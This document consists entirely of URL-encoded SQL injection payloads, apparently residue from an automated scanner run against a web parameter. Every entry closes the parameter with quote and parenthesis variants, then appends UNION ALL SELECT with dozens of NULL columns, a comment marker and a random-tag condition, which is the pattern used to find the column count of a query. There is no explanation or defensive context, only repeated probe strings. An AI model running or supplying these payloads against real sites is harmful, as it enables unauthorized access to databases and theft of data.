1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22OhUk%22%3D%22OhUk 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22jccr%22%3D%22jccr 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22XAhS%22%3D%22XAhS 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22xIkG%22%3D%22xIkG 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22XALw%22%3D%22XALw 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22GMGo%22%3D%22GMGo 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22OzOI%22%3D%22OzOI 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xcrQ%22%3D%22xcrQ 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22ekqw%22%3D%22ekqw 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22CBaU%22%3D%22CBaU 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22Pyxm%22%3D%22Pyxm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22xFCA%22%3D%22xFCA 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22pBTm%22%3D%22pBTm 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22qkky%22%3D%22qkky 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HSuR%22%3D%22HSuR 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22dfCB%22%3D%22dfCB 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22XhnQ%22%3D%22XhnQ 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22CxsT%22%3D%22CxsT 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22Zrxo%22%3D%22Zrxo 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22XSms%22%3D%22XSms 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22YCSu%22%3D%22YCSu 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22iWOL%22%3D%22iWOL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dLpV%22%3D%22dLpV 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22fPSB%22%3D%22fPSB 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22mlIB%22%3D%22mlIB 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22vAdX%22%3D%22vAdX 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22RAqX%22%3D%22RAqX 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22ejbq%22%20LIKE%20%22ejbq 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22WHjg%22%20LIKE%20%22WHjg 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22pNWV%22%20LIKE%20%22pNWV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22nfgV%22%20LIKE%20%22nfgV 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22KzRU%22%20LIKE%20%22KzRU 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22rPnC%22%20LIKE%20%22rPnC 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22Avej%22%20LIKE%20%22Avej 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22mymt%22%20LIKE%20%22mymt 